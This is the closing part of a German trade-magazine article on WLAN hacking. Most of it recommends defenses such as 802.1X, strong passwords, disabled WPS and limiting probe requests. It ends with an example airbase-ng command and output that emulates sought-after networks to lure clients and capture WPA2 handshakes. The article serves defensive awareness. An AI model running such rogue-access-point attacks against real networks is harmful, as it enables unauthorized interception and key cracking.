computerwoche.de

Security

Die Tricks der Kriminellen

Modernes WLAN-Hacking

29.01.2014
Von Sven Blumenstein

Empfehlungen

Wie lassen sich WLANs wirklich gegen Angreifer schützen? Eines vorweg: Aufgrund der angesprochenen Designschwächen im Protokoll kann es keine vollständige Sicherheit geben - zumindest was die Verfügbarkeit eines WLANs angeht. Jeder WLAN-Betreiber sollte sich im Klaren darüber sein, dass ein Angreifer das Funknetz jederzeit lahm legen könnte. Die Vernetzung von geschäftskritischen Systemen per WLAN sollte deshalb gründlich durchdacht sein. Bei den verwendeten Verschlüsselungsverfahren ist eine Lösung auf Basis von 802.1X und Zertifikaten dem klassischen WPA2 mit einem Passwort vorzuziehen. Ist dies aufgrund der verwendeten Endgeräte oder anderen Gründen nicht möglich, sollte das verwendete Passwort den gängigen Passwortrichtlinien entsprechen, um Brute-Force- oder Dictionary-Angriffe zu erschweren.

Derzeit wird bei Generierung von WPA2-Passwörtern eine Länge von mindestens 14 Zeichen unter Verwendung von Groß- und Kleinbuchstaben sowie Zahlen und Sonderzeichen empfohlen. In jedem Fall sollte darauf geachtet werden, dass die Unterstützung für WPS deaktiviert ist. Des Weiteren sind sprechende SSIDs wie beispielsweise "WLAN-FirmaXYZ" tabu, da dies einem Angreifer nicht nur die Auswahl des anzugreifenden WLANs erleichtert, sondern auch dafür sorgt, dass sich die Endgeräte permanent als Client dieses Netzwerkes zu erkennen geben. Das könnte auch zum gezielten Diebstahl eines solchen Gerätes, zum Beispiel in einem Restaurant oder Zug führen (Stichwort Wirtschaftsspionage). Falls technisch möglich, wird empfohlen, die automatische Netzwerksuche und die automatische Verbindung zu WLANs auf den Endgeräten zu unterbinden - das verhindert das Senden von Probe-Requests. Noch besser ist es natürlich, die WLAN-Schnittstelle nur bei Bedarf zu aktivieren.

Eine weitere Schutzmöglichkeit für die Integrität der übertragenen Daten wäre die Verwendung einer zusätzlichen Verschlüsselungsebene wie beispielsweise ein VPN mit IPSec. Um bestimmte Angriffe zu erkennen und teilweise auch zu verhindern, bieten einige Hersteller so genannte "RF Monitoring Systeme" an. Erkennt ein solches System Angriffe auf das WLAN, schlägt es Alarm und leitet auf Wunsch Gegenmaßnahmen ein. Das kann neben dem gezielten Blockieren von bestimmten Verbindungen oder Access Points auch die Lokalisierung von Endgeräten über Triangulation sein.

Fazit

WLANs sind vor allem aufgrund des Booms mobiler Endgeräte präsenter denn je. Die Verbreitung steigt stetig und auch die Netzbetreiber beginnen vermehrt, den steigenden mobilen Datentransfer in WLAN-Hotspots auszulagern. Viele Firmen, die jahrelang ohne WLAN ausgekommen sind, werden durch die steigende Verbreitung mobiler Arbeitsgeräte zum Aufbau eines Funknetzwerkes gezwungen. Geräte, die bisher keine WLAN-Schnittstellen hatten, werden nun entsprechend angreifbar. Betrachtet man die Entwicklung der Endgeräte im Vergleich mit der Entwicklung der Sicherheitsfunktionen in 802.11, zeigen sich deutliche Defizite in den Sicherheitsstandards. Während Angriffe durch neue Techniken immer effizienter werden, hat sich in den letzten Jahren in Bezug auf die Sicherheitsfunktionen nur sehr wenig getan. Unternehmen und Endanwender sollten also kritisch bewerten ob und in welchem Umfang sie WLANs tatsächlich brauchen und die Verwendung unter Umsetzung möglichst vieler der beschriebenen Sicherheitsmaßnahmen abwägen. (sh)

Beispielhafte Probe-Requests

Wir zeigen eine Beispiel-Ausgabe eines Angriffs auf Endgeräte mit Airbase-NG durch die Emulation gesuchter WLANs. In der Ausgabe sind die verschiedenen Probe-Requests von zwei Clients zu sehen. Die hervorgehobenen Zeilen zeigen Aufzeichnungen von WPA2-Handshakes, die für Angriffe auf den WPA2-Schlüssel verwendet werden können.

# airbase-ng -vv -c 8 -Z 4 -W 1 -F capture mon0

16:36:30 Created tap interface at0

16:36:30 Trying to set MTU on at0 to 1500

16:36:30 Access Point with BSSID 00:C0:CA:4F:FF:FF started.

16:36:32 Got directed probe request from 10:0B:A9:76:FF:FF - "Kloster Hotel"

16:36:35 Got directed probe request from 10:0B:A9:50:FF:FF - "AndroidTether"

16:36:41 Got directed probe request from 10:0B:A9:76:FF:FF - "katze"

16:36:42 Got directed probe request from 10:0B:A9:76:FF:FF - "cirobank"

16:36:42 Got directed probe request from 10:0B:A9:76:FF:FF - "lachsfisch"

16:36:42 Got an auth request from 10:0B:A9:76:FF:FF (open system)

16:36:42 Client 10:0B:A9:76:FF:FF associated (WPA2;CCMP) to ESSID: "lachsfisch"

16:36:51 Got directed probe request from DC:2B:61:B3:FF:DD - "cirobank"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "Familie Schmidt"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "RUB-WLAN"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "Boingo Hotspot"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "WLAN FirmaXYZ"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "3A1"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "RUB-WLAN"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "2e2training"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "Hotelinternet"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "maxspot (FREE)"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "evil"

16:36:57 Got an auth request from DC:2B:61:B3:FF:DD (open system)

16:36:57 Client DC:2B:61:B3:FF:DD associated (WPA2;CCMP) to ESSID: "evil"